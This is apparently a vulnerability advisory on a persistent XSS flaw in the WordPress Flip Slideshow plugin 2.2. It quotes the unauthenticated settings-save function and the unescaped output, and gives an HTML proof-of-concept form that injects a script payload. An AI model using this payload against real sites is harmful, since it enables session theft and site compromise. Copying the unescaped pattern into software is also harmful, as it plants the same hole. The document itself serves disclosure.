07 Jun

Persistent Cross-Site Scripting (XSS) Vulnerability in Flip Slideshow

The Flip Slideshow plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.2.

Due to a issue with code shared among several plugins, which we first found in the  Vertical Slideshow plugin, functions intended for Administrator level users in this plugin are accessible to anyone (even if they are not logged in). One of those is save_flp_settings(), which saves values for the plugin’s settings:

133
134
135
136
137
138
139
140
141
142
143
144
145
public function save_flp_settings()
{
	$ops = array();
	foreach($_POST['settings'] as $key => $value)
	{
		$ops[$key] = trim($value);
	}
	update_option('flp_settings', $ops);
	/*
insert xml code part
	*/
 
}

When the values are outputted on the plugin’s settings page, /wp-admin/admin.php?page=flipslideshow_settings, through the file /html/settings.php they are not escaped. For example, the value for “settings[bannerWidth]” is set on line 13:

13
<td><input type="text" name="settings[bannerWidth]"  value="<?php print @$ops['bannerWidth']; ?>" /></td>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=flipslideshow_settings.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=flipslideshow_settings" method="post">
<input type="hidden" name="task" value="save_flp_settings" />
<input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *